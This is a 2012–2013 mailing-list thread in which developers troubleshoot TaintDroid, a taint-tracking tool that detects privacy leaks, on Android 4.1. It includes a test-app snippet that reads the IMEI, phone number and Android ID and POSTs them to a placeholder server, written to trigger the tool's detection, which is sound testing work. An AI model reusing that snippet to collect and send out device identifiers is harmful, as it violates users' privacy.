TaintDroid for Android4.1 not working


Ryo Yamada

Oct 26, 2012, 1:20:55 AM
to taint...@googlegroups.com
I've built TaintDroid for Android 4.1 following the instructions at http://appanalysis.org/download.html.
But when I start the emulator and run a test application that simply sends IMEI by HTTP-POST to a specific server when the button is clicked, 
nothing appears in logcat.

Here's what I did.

1. $ cd ~/tdroid/tdroid-4.1.1_r6
2. $ emulator -system ./out/target/product/generic/system.img -ramdisk ./out/target/product/generic/ramdisk.img&
3. start TaintDroidNotify, then push "Start" button
4. start logcat
5. start my test application

I thought the command to start the emulator was wrong and tried something like the following, but the results were the same.

- $ emulator 
- $ emulator -avd my_avd_4.1 -system ./out/target/product/generic/system.img -ramdisk ./out/target/product/generic/ramdisk.img

Can someone help me?

Peter

Oct 26, 2012, 8:56:20 AM
to taint...@googlegroups.com
Would you mind sharing the source code for your test app?

Thanks,
Peter

Ryo Yamada

Oct 27, 2012, 2:22:33 AM
to taint...@googlegroups.com
Sure, here is the main part that sends IMEI etc. I ran tcpdump simultaneously on my machine and confirmed that the information is leaking.

======================================================================================
    TelephonyManager telephonyManager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE);
    AsyncHttpClient ah = new AsyncHttpClient();   //(Using a library named asynchttpclient to post data)
    RequestParams params = new RequestParams();

    String imei = telephonyManager.getDeviceId();
    // Settings.Secure.ANDROID_ID is only the key name; look up the actual value
    String androidId = android.provider.Settings.Secure.getString(
            getContentResolver(), android.provider.Settings.Secure.ANDROID_ID);
    String phone = telephonyManager.getLine1Number();

    params.put("imei", imei);
    params.put("phone", phone);
    params.put("androidId", androidId);

    ah.post("http://SERVER_IP:80", params, new AsyncHttpResponseHandler(){
        @Override
        public void onSuccess(String arg0) {
            super.onSuccess(arg0);
        }
    });
======================================================================================

On Friday, October 26, 2012 21:56:20 UTC+9, Peter wrote:

gsbabil

Nov 5, 2012, 2:00:58 AM
to taint...@googlegroups.com
Hi Peter,
I could confirm the same for 4.1 on Nexus S.

Peter

Nov 5, 2012, 10:53:46 AM
to taint...@googlegroups.com
Would either of you be willing to put together a runnable code sample, or a set of detailed instructions on how to reproduce? It appears from the posted code excerpt that tracking is lost somewhere inside the library you are using for http post.

Thanks,
Peter

Seth Robertson

Nov 6, 2012, 10:51:09 PM
to taint...@googlegroups.com
I had the same problem when using the emulator and the most recent 4.1.1_r6 code. The lack of test applications or any diagnostics to let me know it is working led me to find https://sites.google.com/site/taintdroid23/files/TaintDroidTester.apk and none of the methods available to me triggered anything. I have no idea whether I am missing some kind of initialization or something (I tried setting "-prop dalvik.vm.execution-mode=int:portable" on the emulator command line to no avail) but I was able to prove that the binaries in the running system had taintdroid code in them.


Peter

Nov 7, 2012, 10:08:22 AM
to taint...@googlegroups.com
Hi guys,

Thanks for reporting this issue. I am able to reproduce the problem using the library from http://loopj.com/android-async-http/. We are working on diagnosing it. Thanks again for your help!


Peter

On Friday, October 26, 2012 1:20:55 AM UTC-4, Ryo Yamada wrote:

Peter

Nov 7, 2012, 2:14:05 PM
to taint...@googlegroups.com
My test app using the android-async-http library to send an http post containing the IMEI is now behaving as expected on the emulator with TaintDroid 4.1, i.e., TaintDroid prints an alert to the log and generates a notification if TaintDroidNotify is running. My code is essentially identical to the code Ryo posted. The issue with my test app was that I neglected to request the permission android.permission.INTERNET in the manifest, and the call to AsyncHttpClient.post was failing silently. Please verify the following:

1. your test app requests the necessary permission android.permission.INTERNET
2. you are working with the latest version of the TaintDroid code. From the root TaintDroid source directory:

repo sync
repo forall dalvik libcore frameworks/base frameworks/native system/vold device/samsung/crespo device/samsung/tuna \
       packages/apps/TaintDroidNotify -c 'git checkout -b taintdroid-4.1.1_r6 --track github/taintdroid-4.1.1_r6 && git pull'

Peter
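The first item in the checklist above can be verified mechanically. The following is an added example, not code from the thread or from the TaintDroid project: it reads a source-form (text) AndroidManifest.xml and reports whether android.permission.INTERNET is requested, missing, or declared somewhere other than as a direct child of `<manifest>`. The function names and sample manifests are constructed for illustration, and the binary manifest inside a built APK is out of scope.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS
INTERNET = "android.permission.INTERNET"

def requested_permissions(manifest_xml):
    """Return (effective, misplaced) permission-name sets from a text manifest."""
    root = ET.fromstring(manifest_xml)
    if root.tag != "manifest":
        raise ValueError("root element is not <manifest>")
    # <uses-permission> belongs directly under <manifest>; anything nested
    # deeper (e.g. inside <application>) is reported separately as misplaced.
    effective = {e.get(NAME_ATTR) for e in root.findall("uses-permission")}
    every = {e.get(NAME_ATTR) for e in root.iter("uses-permission")}
    effective.discard(None)  # name attribute written without the android: prefix
    every.discard(None)
    return effective, every - effective

def check_internet(manifest_xml):
    """Classify the manifest as 'ok', 'misplaced' or 'missing' for INTERNET."""
    effective, misplaced = requested_permissions(manifest_xml)
    if INTERNET in effective:
        return "ok"
    return "misplaced" if INTERNET in misplaced else "missing"

# Constructed sample manifests (not taken from any app in the thread).
_HEAD = ('<manifest xmlns:android="%s" package="com.example.leaktest">'
         '<uses-permission android:name="android.permission.READ_PHONE_STATE"/>'
         % ANDROID_NS)
_PERM = '<uses-permission android:name="%s"/>' % INTERNET
GOOD = _HEAD + _PERM + "<application/></manifest>"
MISSING = _HEAD + "<application/></manifest>"
MISPLACED = _HEAD + "<application>" + _PERM + "</application></manifest>"

if __name__ == "__main__":
    for label, doc in (("good", GOOD), ("missing", MISSING), ("misplaced", MISPLACED)):
        print(label, "->", check_internet(doc))
```
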

gsbabil

Nov 12, 2012, 8:04:06 PM
to taint...@googlegroups.com
Hi Peter,
 - could you please point out which part of the code fixed the issue?
 - the emulator seems to work, builds for real phones still seem to show the previous problem.

Peter

Nov 13, 2012, 9:35:55 PM
to taint...@googlegroups.com
I just checked in an update to taintdroid-4.1.1_r6 on github that should fix this problem on actual devices. Please let me know if it works for you. Thanks for helping out!

Peter

ldelo...@hispasec.com

Apr 8, 2013, 3:44:34 AM
to taint...@googlegroups.com
Dear Peter,

I have checked if TaintDroid 4.1.1_rc6 was detecting any information leakage through INTERNET by sending the IMEI through the interface HttpURLConnection. Unfortunately I do not get any warning in my logs. Nevertheless, it works fine if I try to send out the IMEI via SMS. Could you confirm this problem?

Laurent